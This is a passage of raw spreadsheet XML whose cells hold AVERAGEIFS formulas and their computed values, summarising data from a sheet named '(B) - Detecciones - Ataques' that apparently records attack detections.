        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GO$3:$GO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AU$131)
</f>
        <v>7.5</v>
      </c>
      <c r="AV167" s="528">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GO$3:$GO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AV$131)
</f>
        <v>5</v>
      </c>
      <c r="AW167" s="541" t="s">
        <v>12</v>
      </c>
      <c r="AX167" s="528">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GO$3:$GO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AX$131)
</f>
        <v>4.5</v>
      </c>
      <c r="AY167" s="542" t="s">
        <v>12</v>
      </c>
      <c r="AZ167" s="528">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GO$3:$GO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AZ$131)
</f>
        <v>5</v>
      </c>
      <c r="BA167" s="528">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GO$3:$GO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BA$131)
</f>
        <v>42</v>
      </c>
      <c r="BB167" s="542" t="s">
        <v>12</v>
      </c>
      <c r="BC167" s="528">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GO$3:$GO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BC$131)
</f>
        <v>0.5</v>
      </c>
      <c r="BD167" s="541" t="s">
        <v>12</v>
      </c>
      <c r="BE167" s="528">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GO$3:$GO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BE$131)
</f>
        <v>2</v>
      </c>
      <c r="BF167" s="528">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GO$3:$GO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BF$131)
</f>
        <v>1.5</v>
      </c>
      <c r="BG167" s="528">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GO$3:$GO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BG$131)
</f>
        <v>1</v>
      </c>
      <c r="BH167" s="528">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GO$3:$GO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BH$131)
</f>
        <v>792</v>
      </c>
      <c r="BI167" s="541" t="s">
        <v>12</v>
      </c>
      <c r="BJ167" s="541" t="s">
        <v>12</v>
      </c>
      <c r="BK167" s="541" t="s">
        <v>12</v>
      </c>
      <c r="BL167" s="528">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GO$3:$GO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BL$131)
</f>
        <v>2</v>
      </c>
      <c r="BM167" s="528">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GO$3:$GO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BM$131)
</f>
        <v>362011.3593</v>
      </c>
      <c r="BN167" s="528">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GO$3:$GO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BN$131)
</f>
        <v>176505.0167</v>
      </c>
      <c r="BO167" s="541" t="s">
        <v>12</v>
      </c>
      <c r="BP167" s="541" t="s">
        <v>12</v>
      </c>
      <c r="BQ167" s="528">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GO$3:$GO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BQ$131)
</f>
        <v>1.029411765</v>
      </c>
      <c r="BR167" s="541" t="s">
        <v>12</v>
      </c>
      <c r="BS167" s="528">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GO$3:$GO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BS$131)
</f>
        <v>7.5</v>
      </c>
      <c r="BT167" s="541" t="s">
        <v>12</v>
      </c>
      <c r="BU167" s="541" t="s">
        <v>12</v>
      </c>
      <c r="BV167" s="528">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GO$3:$GO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BV$131)
</f>
        <v>0</v>
      </c>
      <c r="BW167" s="528">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GO$3:$GO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BW$131)
</f>
        <v>10</v>
      </c>
      <c r="BX167" s="541" t="s">
        <v>12</v>
      </c>
      <c r="BY167" s="528">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GO$3:$GO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BY$131)
</f>
        <v>2.6875</v>
      </c>
      <c r="BZ167" s="528">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GO$3:$GO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BZ$131)
</f>
        <v>2.162601626</v>
      </c>
      <c r="CA167" s="542" t="s">
        <v>12</v>
      </c>
      <c r="CB167" s="541" t="s">
        <v>12</v>
      </c>
      <c r="CC167" s="542" t="s">
        <v>12</v>
      </c>
      <c r="CD167" s="541" t="s">
        <v>12</v>
      </c>
      <c r="CE167" s="541" t="s">
        <v>12</v>
      </c>
      <c r="CF167" s="528">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GO$3:$GO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CF$131)
</f>
        <v>9</v>
      </c>
      <c r="CG167" s="541" t="s">
        <v>12</v>
      </c>
      <c r="CH167" s="528">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GO$3:$GO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CH$131)
</f>
        <v>12</v>
      </c>
      <c r="CI167" s="528">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GO$3:$GO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CI$131)
</f>
        <v>35</v>
      </c>
      <c r="CJ167" s="541" t="s">
        <v>12</v>
      </c>
      <c r="CK167" s="528">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GO$3:$GO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CK$131)
</f>
        <v>26</v>
      </c>
      <c r="CL167" s="541" t="s">
        <v>12</v>
      </c>
      <c r="CM167" s="528">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GO$3:$GO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CM$131)
</f>
        <v>90</v>
      </c>
      <c r="CN167" s="528">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GO$3:$GO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CN$131)
</f>
        <v>0</v>
      </c>
      <c r="CO167" s="528">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GO$3:$GO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CO$131)
</f>
        <v>4.625</v>
      </c>
      <c r="CP167" s="528">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GO$3:$GO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CP$131)
</f>
        <v>54</v>
      </c>
      <c r="CQ167" s="528">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GO$3:$GO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CQ$131)
</f>
        <v>10</v>
      </c>
      <c r="CR167" s="541" t="s">
        <v>12</v>
      </c>
      <c r="CS167" s="541" t="s">
        <v>12</v>
      </c>
      <c r="CT167" s="528">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GO$3:$GO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CT$131)
</f>
        <v>0.00499001996</v>
      </c>
      <c r="CU167" s="541" t="s">
        <v>12</v>
      </c>
      <c r="CV167" s="528">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GO$3:$GO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CV$131)
</f>
        <v>7</v>
      </c>
      <c r="CW167" s="541" t="s">
        <v>12</v>
      </c>
      <c r="CX167" s="528">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GO$3:$GO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CX$131)
</f>
        <v>15</v>
      </c>
      <c r="CY167" s="528">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GO$3:$GO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CY$131)
</f>
        <v>3.5</v>
      </c>
      <c r="CZ167" s="541" t="s">
        <v>12</v>
      </c>
      <c r="DA167" s="541" t="s">
        <v>12</v>
      </c>
      <c r="DB167" s="541" t="s">
        <v>12</v>
      </c>
      <c r="DC167" s="541" t="s">
        <v>12</v>
      </c>
      <c r="DD167" s="541" t="s">
        <v>12</v>
      </c>
      <c r="DE167" s="541" t="s">
        <v>12</v>
      </c>
      <c r="DF167" s="541" t="s">
        <v>12</v>
      </c>
      <c r="DG167" s="541" t="s">
        <v>12</v>
      </c>
      <c r="DH167" s="528">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GO$3:$GO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DH$131)
</f>
        <v>3.082222222</v>
      </c>
      <c r="DI167" s="541" t="s">
        <v>12</v>
      </c>
      <c r="DJ167" s="529">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GO$3:$GO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DJ$131)
</f>
        <v>1.727272727</v>
      </c>
      <c r="DK167" s="271"/>
    </row>
    <row r="168">
      <c r="J168" s="277"/>
      <c r="K168" s="512"/>
      <c r="L168" s="512"/>
      <c r="M168" s="512"/>
      <c r="N168" s="512"/>
      <c r="O168" s="278"/>
      <c r="Q168" s="271"/>
      <c r="R168" s="530"/>
      <c r="S168" s="510"/>
      <c r="T168" s="510"/>
      <c r="U168" s="510"/>
      <c r="V168" s="510"/>
      <c r="W168" s="510"/>
      <c r="X168" s="271"/>
      <c r="Y168" s="271"/>
      <c r="Z168" s="271"/>
      <c r="AA168" s="271"/>
      <c r="AB168" s="271"/>
      <c r="AC168" s="271"/>
      <c r="AD168" s="271"/>
      <c r="AE168" s="271"/>
      <c r="AF168" s="271"/>
      <c r="AG168" s="271"/>
      <c r="AH168" s="271"/>
      <c r="AI168" s="512"/>
      <c r="AJ168" s="512"/>
      <c r="AK168" s="512"/>
      <c r="AL168" s="512"/>
      <c r="AM168" s="512"/>
      <c r="AN168" s="512"/>
      <c r="AO168" s="535"/>
      <c r="AP168" s="512"/>
      <c r="AQ168" s="512"/>
      <c r="AR168" s="512"/>
      <c r="AS168" s="512"/>
      <c r="AT168" s="512"/>
      <c r="AU168" s="512"/>
      <c r="AV168" s="512"/>
      <c r="AW168" s="512"/>
      <c r="AX168" s="512"/>
      <c r="AY168" s="512"/>
      <c r="AZ168" s="512"/>
      <c r="BA168" s="512"/>
      <c r="BB168" s="512"/>
      <c r="BC168" s="512"/>
      <c r="BD168" s="512"/>
      <c r="BE168" s="512"/>
      <c r="BF168" s="512"/>
      <c r="BG168" s="512"/>
      <c r="BH168" s="512"/>
      <c r="BI168" s="512"/>
      <c r="BJ168" s="512"/>
      <c r="BK168" s="512"/>
      <c r="BL168" s="512"/>
      <c r="BM168" s="512"/>
      <c r="BN168" s="512"/>
      <c r="BO168" s="512"/>
      <c r="BP168" s="512"/>
      <c r="BQ168" s="512"/>
      <c r="BR168" s="512"/>
      <c r="BS168" s="512"/>
      <c r="BT168" s="512"/>
      <c r="BU168" s="512"/>
      <c r="BV168" s="512"/>
      <c r="BW168" s="512"/>
      <c r="BX168" s="512"/>
      <c r="BY168" s="512"/>
      <c r="BZ168" s="512"/>
      <c r="CA168" s="512"/>
      <c r="CB168" s="512"/>
      <c r="CC168" s="512"/>
      <c r="CD168" s="512"/>
      <c r="CE168" s="512"/>
      <c r="CF168" s="512"/>
      <c r="CG168" s="512"/>
      <c r="CH168" s="512"/>
      <c r="CI168" s="512"/>
      <c r="CJ168" s="512"/>
      <c r="CK168" s="512"/>
      <c r="CL168" s="512"/>
      <c r="CM168" s="512"/>
      <c r="CN168" s="512"/>
      <c r="CO168" s="512"/>
      <c r="CP168" s="512"/>
      <c r="CQ168" s="512"/>
      <c r="CR168" s="512"/>
      <c r="CS168" s="512"/>
      <c r="CT168" s="512"/>
      <c r="CU168" s="512"/>
      <c r="CV168" s="512"/>
      <c r="CW168" s="512"/>
      <c r="CX168" s="512"/>
      <c r="CY168" s="512"/>
      <c r="CZ168" s="512"/>
      <c r="DA168" s="512"/>
      <c r="DB168" s="512"/>
      <c r="DC168" s="512"/>
      <c r="DD168" s="512"/>
      <c r="DE168" s="512"/>
      <c r="DF168" s="512"/>
      <c r="DG168" s="512"/>
      <c r="DH168" s="512"/>
      <c r="DI168" s="512"/>
      <c r="DJ168" s="512"/>
      <c r="DK168" s="271"/>
    </row>
    <row r="169">
      <c r="J169" s="277"/>
      <c r="K169" s="512"/>
      <c r="L169" s="512"/>
      <c r="M169" s="512"/>
      <c r="N169" s="512"/>
      <c r="O169" s="278"/>
      <c r="Q169" s="271"/>
      <c r="R169" s="530"/>
      <c r="S169" s="510"/>
      <c r="T169" s="510"/>
      <c r="U169" s="510"/>
      <c r="V169" s="510"/>
      <c r="W169" s="510"/>
      <c r="X169" s="271"/>
      <c r="Y169" s="271"/>
      <c r="Z169" s="271"/>
      <c r="AA169" s="271"/>
      <c r="AB169" s="271"/>
      <c r="AC169" s="271"/>
      <c r="AD169" s="271"/>
      <c r="AE169" s="271"/>
      <c r="AF169" s="271"/>
      <c r="AG169" s="271"/>
      <c r="AH169" s="271"/>
      <c r="AI169" s="543" t="s">
        <v>2604</v>
      </c>
      <c r="AJ169" s="544" t="s">
        <v>2605</v>
      </c>
      <c r="AK169" s="544" t="s">
        <v>2606</v>
      </c>
      <c r="AL169" s="544" t="s">
        <v>2607</v>
      </c>
      <c r="AM169" s="544" t="s">
        <v>2608</v>
      </c>
      <c r="AN169" s="544" t="s">
        <v>2609</v>
      </c>
      <c r="AO169" s="544" t="s">
        <v>2610</v>
      </c>
      <c r="AP169" s="544" t="s">
        <v>2611</v>
      </c>
      <c r="AQ169" s="544" t="s">
        <v>2612</v>
      </c>
      <c r="AR169" s="544" t="s">
        <v>2613</v>
      </c>
      <c r="AS169" s="544" t="s">
        <v>2614</v>
      </c>
      <c r="AT169" s="545" t="s">
        <v>2615</v>
      </c>
      <c r="AU169" s="512"/>
      <c r="AV169" s="512"/>
      <c r="AW169" s="512"/>
      <c r="AX169" s="512"/>
      <c r="AY169" s="512"/>
      <c r="AZ169" s="512"/>
      <c r="BA169" s="512"/>
      <c r="BB169" s="512"/>
      <c r="BC169" s="512"/>
      <c r="BD169" s="512"/>
      <c r="BE169" s="512"/>
      <c r="BF169" s="512"/>
      <c r="BG169" s="512"/>
      <c r="BH169" s="512"/>
      <c r="BI169" s="512"/>
      <c r="BJ169" s="512"/>
      <c r="BK169" s="512"/>
      <c r="BL169" s="512"/>
      <c r="BM169" s="512"/>
      <c r="BN169" s="512"/>
      <c r="BO169" s="512"/>
      <c r="BP169" s="512"/>
      <c r="BQ169" s="512"/>
      <c r="BR169" s="512"/>
      <c r="BS169" s="512"/>
      <c r="BT169" s="512"/>
      <c r="BU169" s="512"/>
      <c r="BV169" s="512"/>
      <c r="BW169" s="512"/>
      <c r="BX169" s="512"/>
      <c r="BY169" s="512"/>
      <c r="BZ169" s="512"/>
      <c r="CA169" s="512"/>
      <c r="CB169" s="512"/>
      <c r="CC169" s="512"/>
      <c r="CD169" s="512"/>
      <c r="CE169" s="512"/>
      <c r="CF169" s="512"/>
      <c r="CG169" s="512"/>
      <c r="CH169" s="512"/>
      <c r="CI169" s="512"/>
      <c r="CJ169" s="512"/>
      <c r="CK169" s="512"/>
      <c r="CL169" s="512"/>
      <c r="CM169" s="512"/>
      <c r="CN169" s="512"/>
      <c r="CO169" s="512"/>
      <c r="CP169" s="512"/>
      <c r="CQ169" s="512"/>
      <c r="CR169" s="512"/>
      <c r="CS169" s="512"/>
      <c r="CT169" s="512"/>
      <c r="CU169" s="512"/>
      <c r="CV169" s="512"/>
      <c r="CW169" s="512"/>
      <c r="CX169" s="512"/>
      <c r="CY169" s="512"/>
      <c r="CZ169" s="512"/>
      <c r="DA169" s="512"/>
      <c r="DB169" s="512"/>
      <c r="DC169" s="512"/>
      <c r="DD169" s="512"/>
      <c r="DE169" s="512"/>
      <c r="DF169" s="512"/>
      <c r="DG169" s="512"/>
      <c r="DH169" s="512"/>
      <c r="DI169" s="512"/>
      <c r="DJ169" s="512"/>
      <c r="DK169" s="271"/>
    </row>
    <row r="170">
      <c r="J170" s="277"/>
      <c r="K170" s="512"/>
      <c r="L170" s="512"/>
      <c r="M170" s="512"/>
      <c r="N170" s="512"/>
      <c r="O170" s="278"/>
      <c r="Q170" s="271"/>
      <c r="R170" s="531"/>
      <c r="S170" s="510"/>
      <c r="T170" s="510"/>
      <c r="U170" s="510"/>
      <c r="V170" s="510"/>
      <c r="W170" s="510"/>
      <c r="X170" s="271"/>
      <c r="Y170" s="271"/>
      <c r="Z170" s="271"/>
      <c r="AA170" s="271"/>
      <c r="AB170" s="271"/>
      <c r="AC170" s="271"/>
      <c r="AD170" s="271"/>
      <c r="AE170" s="271"/>
      <c r="AF170" s="271"/>
      <c r="AG170" s="271"/>
      <c r="AH170" s="497" t="s">
        <v>2108</v>
      </c>
      <c r="AI170" s="546">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AI$131)
</f>
        <v>0</v>
      </c>
      <c r="AJ170" s="546">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AI$131)
</f>
        <v>0.01073694485</v>
      </c>
      <c r="AK170" s="546">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AI$131)
</f>
        <v>0.01073694485</v>
      </c>
      <c r="AL170" s="546">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AI$131)
</f>
        <v>0.01073694485</v>
      </c>
      <c r="AM170" s="546">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AI$131)
</f>
        <v>0</v>
      </c>
      <c r="AN170" s="546">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AI$131)
</f>
        <v>0.01116504854</v>
      </c>
      <c r="AO170" s="546">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AI$131)
</f>
        <v>0.01116504854</v>
      </c>
      <c r="AP170" s="546">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AI$131)
</f>
        <v>0.01116504854</v>
      </c>
      <c r="AQ170" s="546">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AI$131)
</f>
        <v>0</v>
      </c>
      <c r="AR170" s="546">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AI$131)
</f>
        <v>0.01116504854</v>
      </c>
      <c r="AS170" s="546">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AI$131)
</f>
        <v>0.01116504854</v>
      </c>
      <c r="AT170" s="547">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AI$131)
</f>
        <v>0.01116504854</v>
      </c>
      <c r="AU170" s="512"/>
      <c r="AV170" s="512"/>
      <c r="AW170" s="512"/>
      <c r="AX170" s="512"/>
      <c r="AY170" s="512"/>
      <c r="AZ170" s="512"/>
      <c r="BA170" s="512"/>
      <c r="BB170" s="512"/>
      <c r="BC170" s="512"/>
      <c r="BD170" s="512"/>
      <c r="BE170" s="512"/>
      <c r="BF170" s="512"/>
      <c r="BG170" s="512"/>
      <c r="BH170" s="512"/>
      <c r="BI170" s="512"/>
      <c r="BJ170" s="512"/>
      <c r="BK170" s="512"/>
      <c r="BL170" s="512"/>
      <c r="BM170" s="512"/>
      <c r="BN170" s="512"/>
      <c r="BO170" s="512"/>
      <c r="BP170" s="512"/>
      <c r="BQ170" s="512"/>
      <c r="BR170" s="512"/>
      <c r="BS170" s="512"/>
      <c r="BT170" s="512"/>
      <c r="BU170" s="512"/>
      <c r="BV170" s="512"/>
      <c r="BW170" s="512"/>
      <c r="BX170" s="512"/>
      <c r="BY170" s="512"/>
      <c r="BZ170" s="512"/>
      <c r="CA170" s="512"/>
      <c r="CB170" s="512"/>
      <c r="CC170" s="512"/>
      <c r="CD170" s="512"/>
      <c r="CE170" s="512"/>
      <c r="CF170" s="512"/>
      <c r="CG170" s="512"/>
      <c r="CH170" s="512"/>
      <c r="CI170" s="512"/>
      <c r="CJ170" s="512"/>
      <c r="CK170" s="512"/>
      <c r="CL170" s="512"/>
      <c r="CM170" s="512"/>
      <c r="CN170" s="512"/>
      <c r="CO170" s="512"/>
      <c r="CP170" s="512"/>
      <c r="CQ170" s="512"/>
      <c r="CR170" s="512"/>
      <c r="CS170" s="512"/>
      <c r="CT170" s="512"/>
      <c r="CU170" s="512"/>
      <c r="CV170" s="512"/>
      <c r="CW170" s="512"/>
      <c r="CX170" s="512"/>
      <c r="CY170" s="512"/>
      <c r="CZ170" s="512"/>
      <c r="DA170" s="512"/>
      <c r="DB170" s="512"/>
      <c r="DC170" s="512"/>
      <c r="DD170" s="512"/>
      <c r="DE170" s="512"/>
      <c r="DF170" s="512"/>
      <c r="DG170" s="512"/>
      <c r="DH170" s="512"/>
      <c r="DI170" s="512"/>
      <c r="DJ170" s="512"/>
      <c r="DK170" s="271"/>
    </row>
    <row r="171">
      <c r="J171" s="277"/>
      <c r="K171" s="512"/>
      <c r="L171" s="512"/>
      <c r="M171" s="512"/>
      <c r="N171" s="512"/>
      <c r="O171" s="278"/>
      <c r="Q171" s="271"/>
      <c r="R171" s="530"/>
      <c r="S171" s="510"/>
      <c r="T171" s="510"/>
      <c r="U171" s="510"/>
      <c r="V171" s="510"/>
      <c r="W171" s="510"/>
      <c r="X171" s="271"/>
      <c r="Y171" s="271"/>
      <c r="Z171" s="271"/>
      <c r="AA171" s="271"/>
      <c r="AB171" s="271"/>
      <c r="AC171" s="271"/>
      <c r="AD171" s="271"/>
      <c r="AE171" s="271"/>
      <c r="AF171" s="271"/>
      <c r="AG171" s="271"/>
      <c r="AH171" s="548" t="s">
        <v>2177</v>
      </c>
      <c r="AI171" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AJ$131)
</f>
        <v>1</v>
      </c>
      <c r="AJ171" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AJ$131)
</f>
        <v>1</v>
      </c>
      <c r="AK171" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AJ$131)
</f>
        <v>1</v>
      </c>
      <c r="AL171" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AJ$131)
</f>
        <v>1</v>
      </c>
      <c r="AM171" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AJ$131)
</f>
        <v>1</v>
      </c>
      <c r="AN171" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AJ$131)
</f>
        <v>1</v>
      </c>
      <c r="AO171" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AJ$131)
</f>
        <v>1</v>
      </c>
      <c r="AP171" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AJ$131)
</f>
        <v>1</v>
      </c>
      <c r="AQ171" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AJ$131)
</f>
        <v>1</v>
      </c>
      <c r="AR171" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AJ$131)
</f>
        <v>1</v>
      </c>
      <c r="AS171" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AJ$131)
</f>
        <v>1</v>
      </c>
      <c r="AT171" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AJ$131)
</f>
        <v>1</v>
      </c>
      <c r="AU171" s="512"/>
      <c r="AV171" s="512"/>
      <c r="AW171" s="512"/>
      <c r="AX171" s="512"/>
      <c r="AY171" s="512"/>
      <c r="AZ171" s="512"/>
      <c r="BA171" s="512"/>
      <c r="BB171" s="512"/>
      <c r="BC171" s="512"/>
